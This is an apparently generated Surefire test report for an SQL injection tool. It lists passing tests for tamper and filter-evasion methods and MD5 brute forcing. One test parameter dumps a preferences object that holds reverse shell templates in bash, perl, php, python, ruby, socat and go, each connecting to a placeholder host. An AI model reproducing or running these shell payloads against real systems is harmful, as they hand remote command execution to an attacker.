Surefire Report

Summary

[Summary] [Package List] [Test Cases]

Note: failures are anticipated and checked for with assertions while errors are unanticipated.

Package List

[Summary] [Package List] [Test Cases]

Note: package statistics are not computed recursively, they only sum up all of its testsuites numbers.

(default package)

-	Class	Tests	Errors	Failures	Skipped	Success Rate	Time
	StringUtilSpock	1	0	0	0	100%	0.194 s
	BeanDatabaseSpock	8	0	0	0	100%	0.070 s
	ParameterUtilSpock	3	0	0	0	100%	0.696 s
	TamperingUtilSpock	15	0	0	0	100%	1.276 s
	JsonUtilSpock	7	0	0	0	100%	0.255 s
	BruterSpock	5	0	0	0	100%	1.620 s
	PreferencesUtilSpock	3	0	0	0	100%	1.033 s

Test Cases

[Summary] [Package List] [Test Cases]

StringUtilSpock

Check encoding/decoding methods from StringUtil and HashUtil

0.193 s

BeanDatabaseSpock

	Check bean database hierarchie and labels [database: database, table: table, column: column, #0]	0.010 s
	Check bean database hierarchie and labels	0.032 s
	Check bean database hierarchie and labels without count [database: database, table: table, #0]	0.002 s
	Check bean database hierarchie and labels without count	0.005 s
	Check bean database hierarchies and labels with incorrect count [database: database, table: table, #0]	0.025 s
	Check bean database hierarchies and labels with incorrect count	0.027 s
	Check bean database hierarchies and labels with information_schema [database: information_schema, table: table, #0]	0.003 s
	Check bean database hierarchies and labels with information_schema	0.005 s

ParameterUtilSpock

	Check STAR is used by correct method injection when check all param is disabled	0.447 s
	Check that empty query string, request and header is not allowed	0.155 s
	Check STAR is used one time only	0.094 s

TamperingUtilSpock

	Check Base64	0.705 s
	Check VersionComment	0.160 s
	Check FunctionComment	0.039 s
	Check EqualToLike	0.017 s
	Check RandomCase	0.107 s
	Check StringToChar ab	0.039 s
	Check HexToChar AB	0.042 s
	Check QuoteToUtf8	0.010 s
	Check VersionComment+FunctionComment	0.034 s
	Check VersionComment+FunctionComment+HexToChar	0.058 s
	Check SpaceToMultilineComment	0.023 s
	Check SpaceToDashComment	0.014 s
	Check SpaceToSharpComment	0.011 s
	Check no tampering	0.002 s
	Check eval	0.010 s

JsonUtilSpock

	Add STAR when searching for key [parentXPath: root.d[2][0].d=d, oJsonObject: {"a":"a","b":{"b":"b"},"c":[{"c":"c"}],"d":[null,null,[{"d":"d"}]],"e":{"e":[null,null,[{"e":"e"}]]}}, #0]	0.039 s
	Add STAR when searching for key	0.072 s
	Replace STAR when not searching for key [oJsonObject: {"a":"a*","b":{"b":"b*"},"c":[0,false,{"c":"c*"}],"d":[null,null,[{"d":"d*"}]],"e":{"e":[null,1,false,null,[{"e":"e*"}]]}}, #0]	0.140 s
	Replace STAR when not searching for key	0.143 s
	Map json string to xpath [oJsonObject: {"a":"a","b":{"b":"b"},"c":[{"c":"c"}],"d":[null,null,[{"d":"d"}]],"e":{"e":[null,null,[{"e":"e"}]]},"f":[1,false,[1,true,{"f":true},{"f":1},{"f":[true,1,"f"]}]]}, oJsonArray: [1,true,null,{"a":"a","b":{"b":"b"},"c":[{"c":"c"}],"d":[null,null,[{"d":"d"}]],"e":{"e":[null,null,[{"e":"e"}]]},"f":[1,false,[1,true,{"f":true},{"f":1},{"f":[true,1,"f"]}]]},null], #0]	0.007 s
	Map json string to xpath	0.032 s
	Convert json string to Java JSON	0.003 s

BruterSpock

	Check simple MD5 bruteforce with upperCase and specialCharacters	0.051 s
	Check simple MD5 bruteforce with lowerCase and digits	0.007 s
	Check simple MD5 bruteforce not found	0.042 s
	Check bruteforce hash per second and elapsed time format	1.517 s
	Check elapsed time format	0.002 s

PreferencesUtilSpock

	Check default values are set when loading saved preferences	0.633 s
	Check saved preferences are loaded from the JVM [preferencesUtil: <com.jsql.util.PreferencesUtil@66756662 pathFile=null isCheckingUpdate=true isReportingBugs=true is4K=false isFollowingRedirection=false isHttp2Disabled=false isNotInjectingMetadata=false isNotSearchingCharInsertion=false isNotShowingVulnReport=false isCheckingAllParam=false isCheckingAllURLParam=false isCheckingAllRequestParam=false isCheckingAllHeaderParam=false isCheckingAllBase64Param=false isCheckingAllJsonParam=false isCheckingAllCookieParam=false isCheckingAllSoapParam=false isPerfIndexDisabled=false isDefaultStrategy=false isZipStrategy=false isDiosStrategy=false isUrlEncodingDisabled=false isUrlRandomSuffixDisabled=false isParsingForm=false isNotTestingConnection=false isNotProcessingCookies=false isProcessingCsrf=false isTamperingBase64=false isTamperingFunctionComment=false isTamperingVersionComment=false isTamperingEqualToLike=false isTamperingRandomCase=false isTamperingEval=false isTamperingSpaceToMultilineComment=false isTamperingSpaceToDashComment=false isTamperingSpaceToSharpComment=false csrfUserTag= csrfUserTagOutput= isCsrfUserTag=false isLimitingThreads=true countLimitingThreads=5 isConnectionTimeout=false countConnectionTimeout=15 isUnicodeDecodeDisabled=false isUrlDecodeDisabled=false isStrategyTimeDisabled=false isStrategyBlindBitDisabled=false isStrategyBlindBinDisabled=false isStrategyMultibitDisabled=false isStrategyStackDisabled=false isStrategyErrorDisabled=false isStrategyUnionDisabled=false isLimitingUnionIndex=false countUnionIndex=50 isLimitingSleepTimeStrategy=false countSleepTimeStrategy=5 themeFlatLafName= languageTag= isUserAgentRandom=false isUrlDecodeNetworkTab=false yaml=Yaml:2044792756 commandsReverseYaml=# Edit or add reverse shell scripts with the following template in YAML : # - name: <reverse shell title> # command: <script CLI connecting to the listener> # Command must connect to your IP address and port (%s and %s in that order) - name: bash command: echo '/bin/bash -i >& /dev/tcp/%s/%s 0>&1' > a.sh && /bin/bash a.sh - name: perl command: | perl -e ' use Socket; $i="%s"; $p=%s; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){ open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i"); }; ' - name: php command: | php -r ' $sock=fsockopen("%s",%s); exec("/bin/sh -i <&3 >&3 2>&3"); ' - name: python command: | python3 -c ' import socket,os,pty; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("%s",%s)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); pty.spawn("/bin/sh") ' - name: ruby command: | ruby -rsocket -e' exit if fork; c=TCPSocket.new("%s","%s"); loop{c.gets.chomp!; (exit! if $_=="exit"); ($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts "failed: #{$_}"} ' - name: socat command: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:%s:%s - name: go command: | echo ' package main; import"os/exec"; import"net"; func main(){ c,_:=net.Dial("tcp","%s:%s"); cmd:=exec.Command("/bin/sh"); cmd.Stdin=c; cmd.Stdout=c; cmd.Stderr=c; cmd.Run() } ' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go commandsReverse=[com.jsql.util.reverse.ModelReverse@1d77746b, com.jsql.util.reverse.ModelReverse@4ced17f3, com.jsql.util.reverse.ModelReverse@734a149a, com.jsql.util.reverse.ModelReverse@6ce9771c, com.jsql.util.reverse.ModelReverse@4a9b92c6, com.jsql.util.reverse.ModelReverse@6eed46e9, com.jsql.util.reverse.ModelReverse@4d20616a]>, isCheckingUpdate: false, isReportingBugs: false, is4K: false, isFollowingRedirection: true, isNotInjectingMetadata: true, isNotSearchingCharInsertion: true, isCheckingAllParam: true, isCheckingAllURLParam: true, isCheckingAllRequestParam: true, isCheckingAllHeaderParam: true, isCheckingAllJsonParam: true, isCheckingAllCookieParam: true, isCheckingAllSoapParam: true, isParsingForm: true, isNotTestingConnection: true, isNotProcessingCookies: true, isProcessingCsrf: true, isTamperingBase64: true, isTamperingEqualToLike: true, isTamperingFunctionComment: true, isTamperingVersionComment: true, isTamperingRandomCase: true, isTamperingEval: true, isTamperingSpaceToDashComment: true, isTamperingSpaceToMultilineComment: true, isTamperingSpaceToSharpComment: true, isLimitingThreads: true, countLimitingThreads: 0, isCsrfUserTag: true, csrfUserTag: , #0]	0.083 s
	Check saved preferences are loaded from the JVM	0.382 s